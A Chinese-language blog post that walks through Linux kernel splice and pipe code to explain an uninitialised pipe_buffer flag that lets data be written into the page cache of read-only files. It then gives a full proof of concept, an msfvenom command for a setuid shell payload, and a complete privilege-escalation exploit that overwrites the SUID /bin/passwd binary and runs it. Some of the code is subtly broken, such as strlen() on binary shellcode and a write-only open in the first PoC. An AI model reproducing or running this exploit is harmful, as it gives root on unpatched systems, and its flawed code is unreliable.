// fs/splice.c
/*
 * Validate a file-to-pipe splice request and forward it to the input
 * file's ->splice_read() method.
 *
 * Returns -EBADF when @in is not readable, a negative value from
 * rw_verify_area(), the result of warn_unsupported() when the file has no
 * splice_read method, or otherwise whatever ->splice_read() returns.
 */
static long do_splice_to(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
int ret;
if (unlikely(!(in->f_mode & FMODE_READ)))
return -EBADF;
ret = rw_verify_area(READ, in, ppos, len);
if (unlikely(ret < 0))
return ret;
/* Clamp the length to MAX_RW_COUNT. */
if (unlikely(len > MAX_RW_COUNT))
len = MAX_RW_COUNT;
if (unlikely(!in->f_op->splice_read))
return warn_unsupported(in, "read");
return in->f_op->splice_read(in, ppos, pipe, len, flags);
}
这里以最常见的ext4文件类型举例 可以查询到对应的函数调用表 可以看到最后是调用了generic_file_splice_read()
// fs/ext4/file.c
/*
 * file_operations table for regular ext4 files. The entry relevant here is
 * .splice_read, which points at generic_file_splice_read().
 */
const struct file_operations ext4_file_operations = {
.llseek = ext4_llseek,
.read_iter = ext4_file_read_iter,
.write_iter = ext4_file_write_iter,
.iopoll = iomap_dio_iopoll,
.unlocked_ioctl = ext4_ioctl,
.mmap = ext4_file_mmap,
.mmap_supported_flags = MAP_SYNC,
.open = ext4_file_open,
.release = ext4_release_file,
.fsync = ext4_sync_file,
.get_unmapped_area = thp_get_unmapped_area,
.splice_read = generic_file_splice_read,
.splice_write = iter_file_splice_write,
.fallocate = ext4_fallocate,
};
可以看到该函数还是进行一些基础操作 创建结构体什么的 然后调用call_read_iter()
进行操作
// fs/splice.c
/*
 * Generic ->splice_read(): wrap @pipe in a pipe-type iov_iter and let the
 * file's ordinary read_iter method fill it.
 *
 * Returns the value from call_read_iter(). On success *@ppos is advanced;
 * on failure the iterator is rewound and -EFAULT is reported as -EAGAIN.
 */
ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
struct iov_iter to;
struct kiocb kiocb;
unsigned int i_head;
int ret;
iov_iter_pipe(&to, READ, pipe, len); // set up an iov_iter backed by the pipe
i_head = to.head; // remember the starting slot for rollback
init_sync_kiocb(&kiocb, in); // set up the kiocb for a synchronous read
kiocb.ki_pos = *ppos;
ret = call_read_iter(in, &kiocb, &to); // invoke the file's read_iter
if (ret > 0) { // data was transferred
*ppos = kiocb.ki_pos;
file_accessed(in); // record the access on the file
} else if (ret < 0) { // transfer failed: rewind the iterator to where it started
to.head = i_head;
to.iov_offset = 0;
iov_iter_advance(&to, 0); /* to free what was emitted */
/*
* callers of ->splice_read() expect -EAGAIN on
* "can't put anything in there", rather than -EFAULT.
*/
if (ret == -EFAULT)
ret = -EAGAIN;
}
return ret;
}
最后又是调用对应文件类型的read_iter
// include/linux/fs.h
/*
 * Thin wrapper: invoke the ->read_iter method from @file's file_operations
 * with the given kiocb and iterator, and return its result.
 */
static inline ssize_t call_read_iter(struct file *file, struct kiocb *kio,
struct iov_iter *iter)
{
return file->f_op->read_iter(kio, iter);
}
根据之前的函数调用表可以看到read_iter()
调用的是ext4_file_read_iter()
// fs/ext4/file.c
/*
 * file_operations table for regular ext4 files (quoted a second time).
 * The entry relevant here is .read_iter, which points at
 * ext4_file_read_iter().
 */
const struct file_operations ext4_file_operations = {
.llseek = ext4_llseek,
.read_iter = ext4_file_read_iter,
.write_iter = ext4_file_write_iter,
.iopoll = iomap_dio_iopoll,
.unlocked_ioctl = ext4_ioctl,
.mmap = ext4_file_mmap,
.mmap_supported_flags = MAP_SYNC,
.open = ext4_file_open,
.release = ext4_release_file,
.fsync = ext4_sync_file,
.get_unmapped_area = thp_get_unmapped_area,
.splice_read = generic_file_splice_read,
.splice_write = iter_file_splice_write,
.fallocate = ext4_fallocate,
};
// fs/ext4/file.c
/*
 * ext4 ->read_iter(): reject reads on a forcibly shut down filesystem
 * (-EIO), short-circuit zero-length reads, and route the rest to the
 * direct-I/O path or the generic read path.
 */
static ssize_t ext4_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
{
struct inode *inode = file_inode(iocb->ki_filp);
if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
return -EIO;
if (!iov_iter_count(to))
return 0; /* skip atime */
if (iocb->ki_flags & IOCB_DIRECT)
return ext4_dio_read_iter(iocb, to);
// IOCB_DIRECT not set: take the generic read path
return generic_file_read_iter(iocb, to);
}
// mm/filemap.c
/*
 * Generic ->read_iter(). Most of the body is elided ("..."); the quoted
 * part shows it delegating to generic_file_buffered_read() and returning
 * that result.
 */
ssize_t
generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
size_t count = iov_iter_count(iter);
ssize_t retval = 0;
...
retval = generic_file_buffered_read(iocb, iter, retval);
out:
return retval;
}
代码量太大了 简单讲下功能吧
/*
 * Buffered read. Heavily elided in the article; the quoted part shows the
 * early exits and the call that matters here: each page is handed to
 * copy_page_to_iter(), which links this path to the pipe code above.
 *
 * NOTE(review): the "c" fused onto "ssize_t" below looks like a code-fence
 * language tag left over from extraction - confirm and remove.
 */
cssize_t generic_file_buffered_read(struct kiocb *iocb,
struct iov_iter *iter, ssize_t written)
{
struct file *filp = iocb->ki_filp;
struct file_ra_state *ra = &filp->f_ra;
struct address_space *mapping = filp->f_mapping;
struct inode *inode = mapping->host;
struct page *pages_onstack[PAGEVEC_SIZE], **pages = NULL;
/* Number of pages spanned by [ki_pos, ki_pos + count), capped at 512. */
unsigned int nr_pages = min_t(unsigned int, 512,
((iocb->ki_pos + iter->count + PAGE_SIZE - 1) >> PAGE_SHIFT) -
(iocb->ki_pos >> PAGE_SHIFT));
int i, pg_nr, error = 0;
bool writably_mapped;
loff_t isize, end_offset;
/* Nothing to read past the filesystem's maximum file size. */
if (unlikely(iocb->ki_pos >= inode->i_sb->s_maxbytes))
return 0;
if (unlikely(!iov_iter_count(iter)))
return 0;
...
copied = copy_page_to_iter(pages[i], offset, bytes, iter);
...
}
至此整体已经和之前pipe相关的函数链接上了
根据前面的分析基本上漏洞思路很明晰了
由于pipe_buffer中残留了PIPE_BUF_FLAG_CAN_MERGE标志位的原因 Kernel会将数据写入到文件缓存页中
主要漏洞原因是未对pipe_buffer的标志位进行初始化造成的
POC如下
c#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <strings.h>
#include <sys/stat.h>
#include <sys/user.h>
/*
 * Report a fatal error and terminate the process.
 *
 * buf: NUL-terminated description of what failed.
 *
 * The message is written to stderr, so it is not mixed into redirected
 * stdout, and ends with a newline, so it is not glued to whatever the
 * shell prints next. Does not return: exits with EXIT_FAILURE.
 */
void errExit(const char *buf)
{
    fprintf(stderr, "[x] ERROR: %s\n", buf);
    exit(EXIT_FAILURE);
}
int main(int argc, char **argv, char **envp)
{
size_t page_size;
size_t offset_infile;
int target_filefd;
struct stat target_filestat;
size_t data_length;
int pipe_fd[2];
int pipe_size;
char *buffer;
int retval;
if (argc < 4)
{
puts("[*] Usage: ./exp target_file offset_in_file data");
exit(EXIT_FAILURE);
}
page_size = sysconf(_SC_PAGESIZE);
offset_infile = strtoul(argv[2], NULL, 0);
if (offset_infile % page_size == 0)
{
errExit("Can't write on a whole page");
}
target_filefd = open(argv[1], O_WRONLY);
if (target_filefd < 0)
{
errExit("Open error");
}
if (fstat(target_filefd, &target_filestat) < 0)
{
errExit("fstat error");
}
data_length = strlen(argv[3]);
if (offset_infile + data_length > target_filestat.st_size)
{
errExit("Can't enlarge file");
}
if ((offset_infile % page_size + data_length) > page_size)
{
errExit("Can't write across pages");
}
puts("[*] Start exploiting..");
puts("[*] Setting all pipe_buffer to PIPE_BUF_FLAG_CAN_MERGE");
pipe(pipe_fd);
pipe_size = fcntl(pipe_fd[1], F_GETPIPE_SZ);
buffer = (char *)malloc(pipe_size);
for (int size_left = pipe_size; size_left > 0;)
{
int pre_write = size_left > page_size ? page_size : size_left;
size_left -= write(pipe_fd[1],buffer,pre_write);
}
for (int size_left = pipe_size; size_left > 0;)
{
int pre_write = size_left > page_size ? page_size : size_left;
size_left -= read(pipe_fd[0],buffer,pre_write);
}
puts("[*] flags setting success");
puts("[*] read one bytes from the file by splice");
offset_infile--;
retval=splice(target_filefd,&offset_infile,pipe_fd[1],NULL,1,0);
if(retval<0)
{
errExit("Splice error");
}
else if (retval==0)
{
errExit("Splice is small");
}
puts("[*] splice done");
retval=write(pipe_fd[1],argv[3],data_length);
if(retval<0)
{
errExit("write error");
}
else if(retval<data_length)
{
errExit("write too short");
}
puts("[*] done");
}
编译命令
bashgcc poc.c -o poc -static -masm=intel -g
这里可以选用跟脏牛类似的提权思路 可以新建Root用户提权
或者SUID提权
这里选择SUID提权
使用MSF生成payload
bashmsfvenom -p linux/x64/exec PrependSetuid=True -f elf | xxd -i
EXP如下
c#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <strings.h>
#include <sys/stat.h>
#include <sys/user.h>
/*
 * Report a fatal error and terminate the process.
 *
 * buf: NUL-terminated description of what failed.
 *
 * The message is written to stderr, so it is not mixed into redirected
 * stdout, and ends with a newline, so it is not glued to whatever the
 * shell prints next. Does not return: exits with EXIT_FAILURE.
 */
void errExit(const char *buf)
{
    fprintf(stderr, "[x] ERROR: %s\n", buf);
    exit(EXIT_FAILURE);
}
unsigned char shellcode[]={0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb2, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x48, 0xb8, 0x2f, 0x62,
0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x5e,
0x6a, 0x3b, 0x58, 0x0f, 0x05};
int main(int argc, char **argv, char **envp)
{
size_t page_size;
size_t offset_infile;
int target_filefd;
struct stat target_filestat;
size_t data_length;
int pipe_fd[2];
int pipe_size;
char *buffer;
int retval;
page_size = sysconf(_SC_PAGESIZE);
offset_infile = 1;
if (offset_infile % page_size == 0)
{
errExit("Can't write on a whole page");
}
target_filefd = open("/bin/passwd", O_RDONLY);
if (target_filefd < 0)
{
errExit("Open error");
}
if (fstat(target_filefd, &target_filestat) < 0)
{
errExit("fstat error");
}
data_length = strlen(shellcode);
if (offset_infile + data_length > target_filestat.st_size)
{
errExit("Can't enlarge file");
}
if ((offset_infile % page_size + data_length) > page_size)
{
errExit("Can't write across pages");
}
puts("[*] Start exploiting..");
puts("[*] Setting all pipe_buffer to PIPE_BUF_FLAG_CAN_MERGE");
pipe(pipe_fd);
pipe_size = fcntl(pipe_fd[1], F_GETPIPE_SZ);
buffer = (char *)malloc(pipe_size);
for (int size_left = pipe_size; size_left > 0;)
{
int pre_write = size_left > page_size ? page_size : size_left;
size_left -= write(pipe_fd[1],buffer,pre_write);
}
for (int size_left = pipe_size; size_left > 0;)
{
int pre_write = size_left > page_size ? page_size : size_left;
size_left -= read(pipe_fd[0],buffer,pre_write);
}
puts("[*] flags setting success");
puts("[*] read one bytes from the file by splice");
offset_infile--;
retval=splice(target_filefd,&offset_infile,pipe_fd[1],NULL,1,0);
if(retval<0)
{
errExit("Splice error");
}
else if (retval==0)
{
errExit("Splice is small");
}
puts("[*] splice done");
retval=write(pipe_fd[1],shellcode,data_length);
if(retval<0)
{
errExit("write error");
}
else if(retval<data_length)
{
errExit("write too short");
}
system("/bin/passwd");
puts("[*] done");
}
本文作者:Du4t
本文链接:
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!